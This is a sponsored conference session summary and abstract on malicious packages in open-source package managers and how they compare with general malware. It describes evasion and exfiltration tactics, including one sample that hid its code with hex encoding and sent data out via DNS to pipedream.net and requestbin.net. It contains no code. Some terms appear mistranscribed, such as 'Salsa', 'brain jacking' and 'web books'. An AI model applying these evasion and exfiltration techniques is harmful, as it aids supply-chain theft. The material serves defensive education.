Sponsored Session: Malicious Package Trends Compared With Malware Evolution

Malicious packages are a growing threat to organizations and communities, costing billions of dollars in damages. Attackers use various techniques to exfiltrate private information and evade detection. The community is exploring solutions such as Salsa and S-BOM to reduce the risk, but categorizing malicious packages is still a challenge.

• Malicious packages are a significant threat, costing billions of dollars in damages
• Attackers use various techniques such as dependency hijacking, typo squatting, and brain jacking to exfiltrate private information and evade detection
• Solutions such as Salsa and S-BOM are being explored to reduce the risk of malicious packages
• Categorizing malicious packages is a challenge for the community

The speaker shared an example of a recent malicious package found in the wild that used Lorem Ipsum text and hex encoding to evade detection. The attacker exfiltrated private information via DNS lookup to web books pipedream.net and requestbin.net.

Malicious actors upload their packages into our community package managers on a daily basis. Not surprisingly, malware found in package managers often shares characteristics with malware found elsewhere in cyberspace, providing a valuable learning opportunity. Daniel will analyze those similarities, as well as digging into key differentiators found in open-source-based malware. By comparing the latest tactics and techniques used with malicious packages to the overall evolution of general malware, he will forecast likely future developments for this area and will conclude by a review of key tactics to combat this growing threat and draw tactical lessons from security solutions built for general malware.